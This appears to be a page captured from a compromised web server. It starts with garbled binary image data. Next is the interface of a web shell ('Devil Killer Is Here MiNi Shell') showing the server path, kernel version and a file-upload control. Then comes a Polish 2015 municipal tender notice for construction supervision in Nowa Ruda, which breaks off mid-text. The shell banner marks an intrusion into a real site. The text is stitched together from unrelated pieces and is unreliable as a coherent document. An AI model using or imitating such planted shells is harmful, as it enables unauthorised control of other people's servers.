JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151228/353420-N-2015.html

<p class="kh_header"><b>Nowa Ruda: Pełnienie nadzorów inwestorskich nad prowadzonymi robotami w Gminie Miejskiej Nowa Ruda do 2018 roku.</b><br>
<b>Numer ogłoszenia: 353420 - 2015; data zamieszczenia: 28.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Nowa Ruda , ul. Rynek 1, 57-400 Nowa Ruda, woj. dolnośląskie, tel. 074 8720339, 8720300, faks (074) 872 22 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.nowaruda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzorów inwestorskich nad prowadzonymi robotami w Gminie Miejskiej Nowa Ruda do 2018 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług polegających na kompleksowym pełnieniu nadzoru inwestorskiego w imieniu i na rzecz Zamawiającego, zgodnie z obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r Prawo budowlane w latach 2016-2018 w zakresie: Zamawiający dopuszcza możliwości złożenia ofert częściowych dla 4 części. Część 1 -branża ogólnobudowlana Część 2 - branża instalacje sanitarna Część 3 - branża instalacje elektryczne Część 4 - branża drogowa UWAGI: Zamawiający informuje, że wartości planowanych w budżecie inwestycji Gminy Miejskiej Nowa Ruda do realizacji w latach 2016 - 2018 roku, wg uchwały w sprawie wieloletniego programu finansowania miasta Nowa Ruda, wynosi łącznie dla wszystkich przedsięwzięć- 44.263.314,00 zł brutto. Jednocześnie zamawiający informuje, że nie ma możliwości wskazania inwestycji jak i ich wartości z podziałem na poszczególne branże. Ponadto, zamawiający informuje, że ww. wartość służy wyłącznie celom pomocniczym i poglądowym, a wykonawca powinien we własnym zakresie przyjąć podstawy wyceny, tak aby zakres prac zawarty w wycenie - zapewniał wykonanie przedmiotu zamówienia w sposób określony w SIWZ. Do podstawowych obowiązków i czynności Inspektor Nadzoru w ramach przedmiotu zamówienia należy w szczególności: 1)pełnienie nadzoru zgodnie z obowiązująca ustawą z dnia 7 lipca 1994 r. Prawo budowlane, 2)sprawdzenie w terminie do 7 dni od otrzymania dokumentacji projektowej jej stanu, wskazania elementów dokumentacji wymagających poprawek oraz przydatność do wykonania przewidzianego zadania; 3)protokolarny odbiór dokumentacji projektowej, 4)reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy na realizację inwestycji, 5)wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją inwestycji, 6)współpraca z nadzorem autorskim, 7)organizowanie i prowadzenie raz w tygodniu narad koordynacyjnych z udziałem wykonawcy, a także w zależności od potrzeb projektanta i przedstawicieli użytkownika, sporządza z nich protokoły z podjętymi ustaleniami i przekazuje je w formie elektronicznej (skan dokumentu) zainteresowanym stronom w terminie do 3 dni po naradzie (dotyczy Inspektora wiodącego dla danej inwestycji). 8)zapewnienie zgodności wykonywanych robót z technicznymi i umownymi wymaganiami wykonania robót, 9)rozwiązywanie problemów technicznych w trakcie realizacji inwestycji, 10)rzeczowe i finansowe rozliczenie robót budowlanych, 11)zatwierdzenie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną, 12)szacowanie i weryfikowanie oraz uzgadnianie z Zamawiającym robót dodatkowych, zamiennych, zaproponowanych przez Wykonawcę w zakresie rzeczowym i finansowym, 13) sporządzenie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub zamiennych, pisemne uzasadnienie konieczności wykonania tych prac oraz wnioskowanie do Zamawiającego o ich akceptację, 14) organizacja oraz przeprowadzenie odbioru końcowego oraz przygotowanie protokołu odbioru w porozumieniu z Zamawiającym, 15) uczestnictwo w przeglądach gwarancyjnych z wykonawcą robót (min. raz do roku) po zakończeniu robót ), 16)zapoznanie się z terenem inwestycji, jego uzbrojeniem i istniejącymi urządzeniami, 17)udział w weryfikacji harmonogramu rzeczowo-finansowego zadania i jego ewentualnych aktualizacji, 18)sprawowanie kontroli w zakresie niezbędnym do zabezpieczenia interesów Zamawiającego, w tym: a)reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz zapisami umowy; b) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych i stosownych materiałów (do obowiązków inspektora będzie należało egzekwowanie i odbiór od wykonawcy robót atestów i certyfikatów wyrobów i materiałów przed ich wbudowaniem oraz ich szczegółowa weryfikacja), a w szczególności zapobieganie zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie; c) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających , uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania; d)sprawdzenie i odbiór robót wynikających z harmonogramu robót budowlanych; e)kontrola ilości i wartości wykonywanych robót z obowiązującym harmonogramem oraz terminowość ich wykonania; f)kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót (ilość, jakość, wartość robót), w czasie każdorazowego pobytu na budowie inspektor nadzoru ma obowiązek bieżącego przeglądu dziennika budowy oraz potwierdzenia bytności poprzez dokonanie stosownego zapisu; 19)rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego; 20) branie udziału w komisjach technicznych powołanych do oceny lub rozstrzygnięcia spraw budowy w toku jej trwania; 21)sprawdzanie posiadania przez kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań), dotyczących elementów prefabrykowanych i innych wyrobów, których oceny jakości dokonuje na placu budowy przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania, Wykonawca ma obowiązek żądania od wykonawcy robót budowlanych odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym powiadomieniem Inwestora o zaistniałym fakcie; 22)uczestniczenie w kontrolach przeprowadzonych przez Nadzór Budowlany i inne organy uprawione do kontroli oraz sprawdza realizację ustaleń i decyzji podjętych podczas tych kontroli; 23)uczestniczenie w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją inwestycji w przypadku wystąpienia takiej potrzeby; 24)opiniowanie na wniosek Zamawiającego polisy ubezpieczeniowe Wykonawcy i jej zgodności z warunkami przedstawionymi w SIWZ; 25)opiniowanie wniosków Wykonawcy o przesunięcie planowanego terminu zakończenia robót; 26)na wniosek Zamawiającego opracowywanie informacji z realizowanego zadania inwestycyjnego; 27)nadzorowanie skompletowania Operatu Kolaudacyjnego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do postępowania, Wykonawca ma obowiązek wnieść wadium w wysokości 2 000,00 zł (słownie: dwa tysięcy złotych), oddzielnie dla każdej części zamówienia 2.Wykonawca może wnieść wadium w jednej lub kilku następujących formach: 1)w pieniądzu, 2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3)w gwarancjach bankowych, 4)w gwarancjach ubezpieczeniowych, 5)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.). 3.Wadium musi być złożone lub wpłynąć na rachunek Zamawiającego przed upływem terminu składania ofert. 4.Wykonawca zobowiązany jest wnieść wadium co najmniej na okres związania ofertą, oraz w sytuacji określonej w art. 46 ust. 3 ustawy. 5.Wadium wnoszone w formie pieniężnej należy wpłacać na rachunek Zamawiającego w Gospodarczy Bank Spółdzielczy Radków Nr: 09 9536 0001 2001 0010 7868 0004 z adnotacją: Pełnienie nadzorów inwestorskich nad prowadzonymi robotami w Gminie Miejskiej Nowa Ruda do 2018 roku 6.Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku Zamawiającego. Kserokopię dokumentu potwierdzającego dokonanie przelewu pieniężnego Wykonawca winien dołączyć do oferty. 7.Oryginał wadium, wnoszonego w innej formie niż pieniężna, należy dołączyć, w oddzielnej kopercie z opisem jak w pkt 5 z dopiskiem WADIUM PRZETARGOWE, i dołączyć do składanej oferty. 8.Wadium wnoszone w formach innych niż w pieniądzu, winno gwarantować Zamawiającemu bezwarunkową wypłatę pełnej kwoty wadium, w przypadku zaistnienia okoliczności wskazanych w art. 46 ust. 4a i 5 ustawy na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą. 9.Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających Zamawiającemu wypłacenie wadium. 10.Wykonawca, którego oferta przed upływem terminu składania ofert nie będzie zabezpieczona dopuszczalną formą wadium zostanie wykluczony z postępowania w trybie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie przez Zamawiającego uznana za odrzuconą. 11.Zwrotu lub zatrzymania wadium Zamawiający dokona zgodnie z art. 46 ustawy. Wykonawca traci wadium na rzecz Zamawiającego w przypadkach określonych w art. 46 ust. 4a i ust. 5 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, iż wykonywał w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), co najmniej 2 usługi polegające na: pełnieniu funkcji nadzoru inwestorskiego nad realizacją projektu inwestycyjnego w branży zgodnej z częścią zamówienia, której oferta dotyczy, wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbioru, oraz dokumentem potwierdzającym, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj. dysponują osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób, tj. a)dla części nr 1 - min. 1 osobę posiadającą uprawnienia budowlane wymagane do prowadzenia nadzoru inwestorskiego w specjalności: konstrukcyjno-budowlanej i posiadającą min.3 letnie doświadczenie zawodowe; b)dla części nr 2 - min. 1 osobę posiadającą uprawnienia budowlane wymagane do prowadzenia nadzoru inwestorskiego w specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i posiadającą min.3 letnie doświadczenie zawodowe;; c)dla części nr 3 - min. 1 osobę posiadającą uprawnienia budowlane wymagane do prowadzenia nadzoru inwestorskiego w specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i posiadającą min.3 letnie doświadczenie zawodowe;; d)dla części nr 4 - min. 1 osobę posiadającą uprawnienia budowlane wymagane do prowadzenia nadzoru inwestorskiego w branży drogowej i posiadającą min.3 letnie doświadczenie zawodowe; Zamawiający dopuszcza możliwość łączenia funkcji, poprzez wskazanie jednej osoby do pełnienia dwóch lub większej ilości funkcji, w sytuacji kiedy osoba ta spełnia wymienione w SIWZ warunki dla tych stanowisk.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - ilość proponowanych pobytów na budowie w tygodniu - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w przypadku, gdy wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. W takim przypadku strony mogą zmienić takie elementy umowy, na które powyższe okoliczności mają wpływ, w tym również mogą dokonać zmiany terminu zakończenia wykonania Przedmiotu umowy. 2.W przypadkach określonych w ust. 1 przedłużenie terminu wykonania Przedmiotu umowy może nastąpić o czas niezbędny do jego wykonania, jednak nie dłużej niż o okres trwania przeszkody uniemożliwiającej wykonywanie Przedmiotu umowy. Przedłużenie terminu Zamawiający warunkuje złożeniem przez Wykonawcę stosownego wniosku o sporządzenie aneksu do umowy wraz z powołaniem się na podstawę zmiany umowy i uzasadnieniem wniosku opisującym okoliczności faktyczne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.nowaruda.biuletyn.net/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: w Urzędzie Miejskim w Nowej Rudzie, ul. Rynek 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2016 godzina 10:20, miejsce: w siedzibie Zamawiającego: w Urzędzie Miejskim w Nowej Rudzie, ul. Rynek 1, pok. nr 13..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> branża ogólnobudowlana..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług polegających na kompleksowym pełnieniu nadzoru inwestorskiego w imieniu i na rzecz Zamawiającego, zgodnie z obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r Prawo budowlane w latach 2016-2018 w zakresie: Zamawiający dopuszcza możliwości złożenia ofert częściowych dla 4 części. Część 1 -branża ogólnobudowlana Część 2 - branża instalacje sanitarna Część 3 - branża instalacje elektryczne Część 4 - branża drogowa UWAGI: Zamawiający informuje, że wartości planowanych w budżecie inwestycji Gminy Miejskiej Nowa Ruda do realizacji w latach 2016 - 2018 roku, wg uchwały w sprawie wieloletniego programu finansowania miasta Nowa Ruda, wynosi łącznie dla wszystkich przedsięwzięć- 44.263.314,00 zł brutto. Jednocześnie zamawiający informuje, że nie ma możliwości wskazania inwestycji jak i ich wartości z podziałem na poszczególne branże. Ponadto, zamawiający informuje, że ww. wartość służy wyłącznie celom pomocniczym i poglądowym, a wykonawca powinien we własnym zakresie przyjąć podstawy wyceny, tak aby zakres prac zawarty w wycenie - zapewniał wykonanie przedmiotu zamówienia w sposób określony w SIWZ. Do podstawowych obowiązków i czynności Inspektor Nadzoru w ramach przedmiotu zamówienia należy w szczególności: 1)pełnienie nadzoru zgodnie z obowiązująca ustawą z dnia 7 lipca 1994 r. Prawo budowlane, 2)sprawdzenie w terminie do 7 dni od otrzymania dokumentacji projektowej jej stanu, wskazania elementów dokumentacji wymagających poprawek oraz przydatność do wykonania przewidzianego zadania; 3)protokolarny odbiór dokumentacji projektowej, 4)reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy na realizację inwestycji, 5)wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją inwestycji, 6)współpraca z nadzorem autorskim, 7)organizowanie i prowadzenie raz w tygodniu narad koordynacyjnych z udziałem wykonawcy, a także w zależności od potrzeb projektanta i przedstawicieli użytkownika, sporządza z nich protokoły z podjętymi ustaleniami i przekazuje je w formie elektronicznej (skan dokumentu) zainteresowanym stronom w terminie do 3 dni po naradzie (dotyczy Inspektora wiodącego dla danej inwestycji). 8)zapewnienie zgodności wykonywanych robót z technicznymi i umownymi wymaganiami wykonania 